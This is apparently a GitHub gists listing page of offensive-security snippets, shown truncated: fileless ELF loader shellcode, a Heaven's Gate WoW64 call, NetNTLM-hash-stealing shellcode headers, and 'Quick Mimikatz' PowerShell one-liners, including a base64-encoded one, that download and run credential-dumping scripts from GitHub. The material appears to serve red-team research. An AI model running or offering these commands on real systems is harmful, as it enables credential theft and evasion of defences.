Ege Balcı EgeBalci
😎
EgeBalci
/ shodan-ip-download.py
Created
April 27, 2018 20:13
— forked from jivoi/shodan-ip-download.py
A Python script to lookup available information in Shodan for a list of IPs and save the data to a local file that can be processed using the Shodan CLI.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from shodan import Shodan | |
| from shodan.helpers import open_file, write_banner | |
| from shodan.cli.helpers import get_api_key | |
| from sys import argv, exit | |
| # Input validation | |
| if len(argv) != 3: | |
| print('Usage: {} <IPs filename> <output.json.gz>'.format(argv[0])) | |
| print('Example: {} grizzly-ips.txt shodan-grizzly.json.gz'.format(argv[0])) | |
| exit(1) |
EgeBalci
/ syscall_extractor.cpp
Created
October 7, 2018 21:45
— forked from hasherezade/syscall_extractor.cpp
Extracts syscalls list from NTDLL.DLL
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <Windows.h> | |
| // based on: https://www.evilsocket.net/2014/02/11/on-windows-syscall-mechanism-and-syscall-numbers-extraction-methods/ | |
| // author: @evilsocket | |
| // modified by: @hasherezade | |
| #define IS_ADDRESS_BETWEEN( left, right, address ) ( (address) >= (left) && (address) < (right) ) | |
| PIMAGE_SECTION_HEADER SectionByRVA( PIMAGE_SECTION_HEADER pSections, DWORD dwSections, DWORD rva ) | |
| { |
EgeBalci
/ mem-loader.asm
Created
October 9, 2018 10:36
— forked from zznop/mem-loader.asm
Fun little loader shellcode that executes an ELF in-memory using an anonymous file descriptor (inspired by https://x-c3ll.github.io/posts/fileless-memfd_create/)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; | |
| ;;; | |
| ;;; Copyright (C), zznop, [email protected] | |
| ;;; | |
| ;;; This software may be modified and distributed under the terms | |
| ;;; of the MIT license. See the LICENSE file for details. | |
| ;;; | |
| ;;; DESCRIPTION | |
| ;;; | |
| ;;; This PoC shellcode is meant to be compiled as a blob and prepended to a ELF |
EgeBalci
/ WoW64_call.cpp
Created
December 6, 2018 16:21
— forked from Cr4sh/WoW64_call.cpp
WoW64 Heaven's Gate
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "stdafx.h" | |
| #define DB(_val_) __asm __emit (_val_) | |
| #define INVALID_SYSCALL (DWORD)(-1) | |
| // code selectors | |
| #define CS_32 0x23 | |
| #define CS_64 0x33 |
EgeBalci
/ Quick-Mimikatz
Created
May 6, 2019 15:36
— forked from gfoss/Quick-Mimikatz
Quick Mimikatz
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| *NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!* | |
| #mimikatz | |
| IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m | |
| #encoded-mimikatz | |
| powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAnACkAOwAgACQAbQAgAD0AIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0ARAB1AG0AcABDAHIAZQBkAHMAOwAgACQAbQAKAA== | |
| #mimikittenz | |
| IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ;-----------------------------------------------------------------------------; | |
| ; Author: Ege Balcı (egebalci[at]pm[dot]me) | |
| ; Compatible: All Windows versions with SMBv2/v1 | |
| ; Version: 1.0 (26 June 2019) | |
| ; Size: 185 bytes + strlen(IP) + 1 | |
| ; Build: nasm -f bin steal_netntlm.asm -o shellcode && xxd -i shellcode | |
| ;-----------------------------------------------------------------------------; | |
| [BITS 32] | |
| [ORG 0] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ;-----------------------------------------------------------------------------; | |
| ; Author: Ege Balcı (egebalci[at]pm[dot]me) | |
| ; Compatible: All Windows versions with SMBv2/v1 | |
| ; Architecture: x64 | |
| ; Size: 265 + strlen(IP) + 1 | |
| ; Build: nasm -f bin steal_netntlm_x64.asm -o shellcode && xxd -i shellcode | |
| ;-----------------------------------------------------------------------------; | |
| [BITS 64] | |
| [ORG 0] |
EgeBalci
/ clr_via_native.c
Created
August 6, 2020 05:16
— forked from xpn/clr_via_native.c
A quick example showing loading CLR via native code
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "stdafx.h" | |
| int main() | |
| { | |
| ICLRMetaHost *metaHost = NULL; | |
| IEnumUnknown *runtime = NULL; | |
| ICLRRuntimeInfo *runtimeInfo = NULL; | |
| ICLRRuntimeHost *runtimeHost = NULL; | |
| IUnknown *enumRuntime = NULL; | |
| LPWSTR frameworkName = NULL; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| if [ $# -eq 0 ] | |
| then | |
| echo "[*] Usage: $0 [FILE]" | |
| exit | |
| fi | |
| echo "SHA256,SHA1,MD5,FILENAME" | |
| for file in "$@" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 6e8934a7405afe5ee5a2d1749aa8a7e7ee5e2a24614fdc0ddbaaf1148fb1719c9be1fe5709037b8274aab95f56c8f3ce43aa2444f1316b86615772109c725bfd | |
| 5189f87772c940f18639e13b13444dddf77af2697d873de73375632596810dc5ba6730bf489eb9725e56d0a37752af9d26a53c8263cf8a817679713b430fef32 | |
| 6571a5d957cf126a62f808d9edaedb0eccdd6240e594cd26ad4f46f3276a52790c6c4666aa93278d95299afb7151f5840bb9a51b84729753c53f2f6a847c0afd poc video | |
| a869e187c12d4d9ef0ad6a636f22a89830bba2d44d1fcf46618d92a117593b77d2c97f4173cdd145c63704d93889a4b6f733bd31ec08f7762dbff1a985a04d6a poc video |
OlderNewer